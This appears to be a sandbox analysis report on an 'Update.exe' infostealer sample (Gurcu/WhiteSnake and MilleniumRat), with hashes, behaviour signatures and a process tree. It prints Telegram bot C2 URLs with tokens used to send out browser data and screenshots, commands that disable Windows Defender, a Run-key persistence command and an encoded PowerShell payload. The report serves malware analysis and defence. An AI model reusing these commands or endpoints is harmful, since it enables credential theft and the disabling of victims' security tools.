Analysis

  • max time kernel
    82s
  • max time network
    163s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    27-06-2024 14:59

General

  • Target

    Update.exe

  • Size

    38.5MB

  • MD5

    e1677dda9029b6a47c09f89fadcb32fe

  • SHA1

    2ba06de5df5348336de4218d8dfb08cb89687f29

  • SHA256

    85d1a8a1b427c26b9b6d304658dcef90998687e1ca894293bbe335da9b79eb69

  • SHA512

    5189213d706def83e4be07c2557dedf34e35c305a8453417083027c03d32822687fcd3d1d55778449d51ee97d4293fd7f489ef7a673bb956318f44c629bd5107

  • SSDEEP

    786432:5RQBrMQP00pusvRWJ67Q/UBBf3gss9rUqJsQ5mmKr1+5dbRho:5ROrLLvRk/ywss5Jwkd

Malware Config

Extracted

Family

gurcu

C2

https://api.telegram.org/bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/sendDocument?chat_id=-1002245526003&caption=%F0%9F%93%82%20-%20Browser%20data%0A%E2%94%9C%E2%94%80%E2%94%80%20%F0%9F%93%82%20-%20cookies(0%20kb

https://api.telegram.org/bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/sendMessage?chat_id=-1002245526003

https://api.telegram.org/bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-

https://api.telegram.org/bot7457548429:AAGMvKYWjBbGXayEC5uoksRl1i2BIy7ylDg/sendMessage?chat_id=6024388590

https://api.telegram.org/bot7457548429:AAGMvKYWjBbGXayEC5uoksRl1i2BIy7ylDg/getUpdates?offset=-

https://api.telegram.org/bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/sendDocument?chat_id=-1002245526003&caption=%F0%9F%93%B8Screenshot%20take

Signatures

  • Gurcu, WhiteSnake

    Gurcu is a malware stealer written in C#.

  • MilleniumRat

    MilleniumRat is a remote access trojan written in C#.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 12 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Contacts a large (1000) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Stops running service(s) 4 TTPs
  • Checks computer location settings 2 TTPs 4 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 13 IoCs
  • Loads dropped DLL 51 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • UPX packed file 45 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 9 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Drops file in Program Files directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Launches sc.exe 10 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Detects Pyinstaller 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 8 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Enumerates processes with tasklist 1 TTPs 4 IoCs
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Kills process with taskkill 7 IoCs
  • Modifies data under HKEY_USERS 47 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 30 IoCs
  • Suspicious use of SendNotifyMessage 29 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:632
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
          PID:376
      • C:\Windows\system32\lsass.exe
        C:\Windows\system32\lsass.exe
        1⤵
          PID:692
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
          1⤵
            PID:964
          • C:\Windows\system32\svchost.exe
            C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
            1⤵
              PID:396
            • C:\Windows\system32\svchost.exe
              C:\Windows\system32\svchost.exe -k netsvcs -p -s DsmSvc
              1⤵
                PID:764
              • C:\Windows\System32\svchost.exe
                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
                1⤵
                  PID:1040
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                  1⤵
                    PID:1052
                  • C:\Windows\System32\svchost.exe
                    C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                    1⤵
                      PID:1060
                    • C:\Windows\system32\svchost.exe
                      C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                      1⤵
                        PID:1180
                        • C:\Windows\system32\taskhostw.exe
                          taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
                          2⤵
                            PID:2936
                          • C:\Program Files\Google\Chrome\updater.exe
                            "C:\Program Files\Google\Chrome\updater.exe"
                            2⤵
                            • Suspicious use of NtCreateUserProcessOtherParentProcess
                            • Executes dropped EXE
                            • Suspicious use of SetThreadContext
                            PID:380
                        • C:\Windows\System32\svchost.exe
                          C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                          1⤵
                          • Drops file in System32 directory
                          PID:1216
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                          1⤵
                            PID:1288
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                            1⤵
                              PID:1372
                            • C:\Windows\system32\svchost.exe
                              C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                              1⤵
                                PID:1408
                              • C:\Windows\System32\svchost.exe
                                C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                1⤵
                                  PID:1416
                                • C:\Windows\system32\svchost.exe
                                  C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                  1⤵
                                    PID:1436
                                  • C:\Windows\system32\svchost.exe
                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                    1⤵
                                      PID:1448
                                      • C:\Windows\system32\sihost.exe
                                        sihost.exe
                                        2⤵
                                          PID:2548
                                      • C:\Windows\system32\svchost.exe
                                        C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                        1⤵
                                          PID:1544
                                        • C:\Windows\system32\svchost.exe
                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                          1⤵
                                            PID:1624
                                          • C:\Windows\System32\svchost.exe
                                            C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                            1⤵
                                              PID:1676
                                            • C:\Windows\System32\svchost.exe
                                              C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                              1⤵
                                                PID:1744
                                              • C:\Windows\System32\svchost.exe
                                                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                1⤵
                                                  PID:1788
                                                • C:\Windows\System32\svchost.exe
                                                  C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                                  1⤵
                                                    PID:1856
                                                  • C:\Windows\system32\svchost.exe
                                                    C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                                    1⤵
                                                      PID:1884
                                                    • C:\Windows\System32\svchost.exe
                                                      C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                      1⤵
                                                        PID:1892
                                                      • C:\Windows\System32\svchost.exe
                                                        C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                        1⤵
                                                          PID:1964
                                                        • C:\Windows\system32\svchost.exe
                                                          C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                          1⤵
                                                            PID:1972
                                                          • C:\Windows\System32\spoolsv.exe
                                                            C:\Windows\System32\spoolsv.exe
                                                            1⤵
                                                              PID:1300
                                                            • C:\Windows\System32\svchost.exe
                                                              C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                              1⤵
                                                                PID:2068
                                                              • C:\Windows\System32\svchost.exe
                                                                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                                1⤵
                                                                  PID:2192
                                                                • C:\Windows\system32\svchost.exe
                                                                  C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                                  1⤵
                                                                    PID:2380
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                                    1⤵
                                                                      PID:2388
                                                                    • C:\Windows\system32\svchost.exe
                                                                      C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
                                                                      1⤵
                                                                      • Drops file in System32 directory
                                                                      PID:2536
                                                                    • C:\Windows\system32\svchost.exe
                                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                      1⤵
                                                                        PID:2588
                                                                      • C:\Windows\sysmon.exe
                                                                        C:\Windows\sysmon.exe
                                                                        1⤵
                                                                          PID:2608
                                                                        • C:\Windows\System32\svchost.exe
                                                                          C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                          1⤵
                                                                            PID:2632
                                                                          • C:\Windows\system32\svchost.exe
                                                                            C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                            1⤵
                                                                              PID:2668
                                                                            • C:\Windows\system32\svchost.exe
                                                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                                              1⤵
                                                                                PID:2676
                                                                              • C:\Windows\system32\svchost.exe
                                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                                1⤵
                                                                                  PID:2684
                                                                                • C:\Windows\system32\svchost.exe
                                                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
                                                                                  1⤵
                                                                                    PID:3016
                                                                                  • C:\Windows\system32\wbem\unsecapp.exe
                                                                                    C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                                    1⤵
                                                                                      PID:60
                                                                                    • C:\Windows\system32\svchost.exe
                                                                                      C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                                      1⤵
                                                                                        PID:3296
                                                                                      • C:\Windows\Explorer.EXE
                                                                                        C:\Windows\Explorer.EXE
                                                                                        1⤵
                                                                                          PID:3372
                                                                                          • C:\Users\Admin\AppData\Local\Temp\Update.exe
                                                                                            "C:\Users\Admin\AppData\Local\Temp\Update.exe"
                                                                                            2⤵
                                                                                            • Suspicious use of WriteProcessMemory
                                                                                            PID:2080
                                                                                            • C:\Users\Admin\AppData\Local\Temp\Update.exe
                                                                                              "C:\Users\Admin\AppData\Local\Temp\Update.exe"
                                                                                              3⤵
                                                                                              • Loads dropped DLL
                                                                                              • Suspicious use of WriteProcessMemory
                                                                                              PID:5080
                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\_MEI20802\Build.exe -pbeznogym
                                                                                                4⤵
                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                PID:2804
                                                                                                • C:\Users\Admin\AppData\Local\Temp\_MEI20802\Build.exe
                                                                                                  C:\Users\Admin\AppData\Local\Temp\_MEI20802\Build.exe -pbeznogym
                                                                                                  5⤵
                                                                                                  • Checks computer location settings
                                                                                                  • Executes dropped EXE
                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                  PID:4724
                                                                                                  • C:\ProgramData\Microsoft\hacn.exe
                                                                                                    "C:\ProgramData\Microsoft\hacn.exe"
                                                                                                    6⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                    PID:3520
                                                                                                    • C:\ProgramData\Microsoft\hacn.exe
                                                                                                      "C:\ProgramData\Microsoft\hacn.exe"
                                                                                                      7⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Loads dropped DLL
                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                      PID:1668
                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\_MEI35202\s.exe -pbeznogym
                                                                                                        8⤵
                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                        PID:1852
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI35202\s.exe
                                                                                                          C:\Users\Admin\AppData\Local\Temp\_MEI35202\s.exe -pbeznogym
                                                                                                          9⤵
                                                                                                          • Checks computer location settings
                                                                                                          • Executes dropped EXE
                                                                                                          • Suspicious use of WriteProcessMemory
                                                                                                          PID:4980
                                                                                                          • C:\ProgramData\main.exe
                                                                                                            "C:\ProgramData\main.exe"
                                                                                                            10⤵
                                                                                                            • Checks computer location settings
                                                                                                            • Executes dropped EXE
                                                                                                            • Loads dropped DLL
                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                            PID:5036
                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                              "C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmpBF25.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmpBF25.tmp.bat
                                                                                                              11⤵
                                                                                                                PID:7608
                                                                                                                • C:\Windows\system32\tasklist.exe
                                                                                                                  Tasklist /fi "PID eq 5036"
                                                                                                                  12⤵
                                                                                                                  • Enumerates processes with tasklist
                                                                                                                  PID:5596
                                                                                                                • C:\Windows\system32\find.exe
                                                                                                                  find ":"
                                                                                                                  12⤵
                                                                                                                    PID:5160
                                                                                                                  • C:\Windows\system32\timeout.exe
                                                                                                                    Timeout /T 1 /Nobreak
                                                                                                                    12⤵
                                                                                                                    • Delays execution with timeout.exe
                                                                                                                    PID:7672
                                                                                                                  • C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe
                                                                                                                    "C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe"
                                                                                                                    12⤵
                                                                                                                    • Checks computer location settings
                                                                                                                    • Executes dropped EXE
                                                                                                                    • Loads dropped DLL
                                                                                                                    • Checks processor information in registry
                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                    PID:3288
                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                      "C:\Windows\System32\cmd.exe" /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ChromeUpdate /t REG_SZ /d C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe /f
                                                                                                                      13⤵
                                                                                                                        PID:7592
                                                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                          14⤵
                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                          PID:5920
                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                          reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ChromeUpdate /t REG_SZ /d C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe /f
                                                                                                                          14⤵
                                                                                                                          • Adds Run key to start application
                                                                                                                          • Modifies registry key
                                                                                                                          PID:7888
                                                                                                                • C:\ProgramData\svchost.exe
                                                                                                                  "C:\ProgramData\svchost.exe"
                                                                                                                  10⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                                  PID:1648
                                                                                                                  • C:\ProgramData\svchost.exe
                                                                                                                    "C:\ProgramData\svchost.exe"
                                                                                                                    11⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    • Loads dropped DLL
                                                                                                                    • Adds Run key to start application
                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                    PID:5624
                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                      C:\Windows\system32\cmd.exe /c "ver"
                                                                                                                      12⤵
                                                                                                                        PID:5276
                                                                                                                  • C:\ProgramData\setup.exe
                                                                                                                    "C:\ProgramData\setup.exe"
                                                                                                                    10⤵
                                                                                                                    • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                    • Executes dropped EXE
                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                    • Drops file in Program Files directory
                                                                                                                    PID:7028
                                                                                                          • C:\ProgramData\Microsoft\based.exe
                                                                                                            "C:\ProgramData\Microsoft\based.exe"
                                                                                                            6⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • Suspicious use of WriteProcessMemory
                                                                                                            PID:1660
                                                                                                            • C:\ProgramData\Microsoft\based.exe
                                                                                                              "C:\ProgramData\Microsoft\based.exe"
                                                                                                              7⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Loads dropped DLL
                                                                                                              • Suspicious use of WriteProcessMemory
                                                                                                              PID:4832
                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'"
                                                                                                                8⤵
                                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                                PID:3252
                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'
                                                                                                                  9⤵
                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                  PID:888
                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                                                                                                8⤵
                                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                                PID:1732
                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                                                                                                  9⤵
                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                  PID:3008
                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‎ ‌  .scr'"
                                                                                                                8⤵
                                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                                PID:1396
                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‎ ‌  .scr'
                                                                                                                  9⤵
                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                  PID:1564
                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                8⤵
                                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                                PID:2864
                                                                                                                • C:\Windows\system32\tasklist.exe
                                                                                                                  tasklist /FO LIST
                                                                                                                  9⤵
                                                                                                                  • Enumerates processes with tasklist
                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                  PID:4504
                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                8⤵
                                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                                PID:4136
                                                                                                                • C:\Windows\system32\tasklist.exe
                                                                                                                  tasklist /FO LIST
                                                                                                                  9⤵
                                                                                                                  • Enumerates processes with tasklist
                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                  PID:3068
                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
                                                                                                                8⤵
                                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                                PID:4732
                                                                                                                • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                  WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                                                                                                                  9⤵
                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                  PID:5576
                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
                                                                                                                8⤵
                                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                                PID:3120
                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  powershell Get-Clipboard
                                                                                                                  9⤵
                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                  PID:5592
                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                8⤵
                                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                                PID:4876
                                                                                                                • C:\Windows\system32\tasklist.exe
                                                                                                                  tasklist /FO LIST
                                                                                                                  9⤵
                                                                                                                  • Enumerates processes with tasklist
                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                  PID:5908
                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                8⤵
                                                                                                                  PID:2372
                                                                                                                  • C:\Windows\system32\tree.com
                                                                                                                    tree /A /F
                                                                                                                    9⤵
                                                                                                                      PID:6064
                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                    C:\Windows\system32\cmd.exe /c "systeminfo"
                                                                                                                    8⤵
                                                                                                                      PID:5412
                                                                                                                      • C:\Windows\system32\systeminfo.exe
                                                                                                                        systeminfo
                                                                                                                        9⤵
                                                                                                                        • Gathers system information
                                                                                                                        PID:3904
                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                      C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZ